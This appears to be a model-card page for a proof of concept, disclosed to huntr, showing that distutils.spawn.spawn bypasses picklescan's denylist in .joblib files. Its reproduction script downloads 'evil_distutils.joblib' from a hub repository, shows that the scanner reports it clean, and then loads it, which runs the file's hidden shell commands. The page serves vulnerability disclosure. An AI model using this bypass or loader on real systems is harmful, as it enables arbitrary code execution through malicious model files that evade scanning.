distutils.spawn.spawn โ€” picklescan bypass PoC (.joblib)

Security research PoC for huntr MFV submission.

Vulnerability: distutils.spawn.spawn is absent from picklescan's _unsafe_globals denylist. A .joblib file embedding this gadget executes arbitrary shell commands while picklescan reports issues=0, infected_files=0 (CLEAN).

Affected: picklescan โ‰ค 1.0.4 (latest), Python โ‰ค 3.11

Reproduction

pip3 install joblib picklescan
python3 -c "
import os, joblib
from huggingface_hub import hf_hub_download
path = hf_hub_download('th3-j0k3r/distutils-spawn-picklescan-bypass', 'evil_distutils.joblib')
import io
from picklescan.scanner import scan_bytes
data = open(path,'rb').read()
r = scan_bytes(io.BytesIO(data), 'evil_distutils.joblib')
print('picklescan result: issues=%d infected=%d' % (r.issues_count, r.infected_files))
joblib.load(path)
"
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support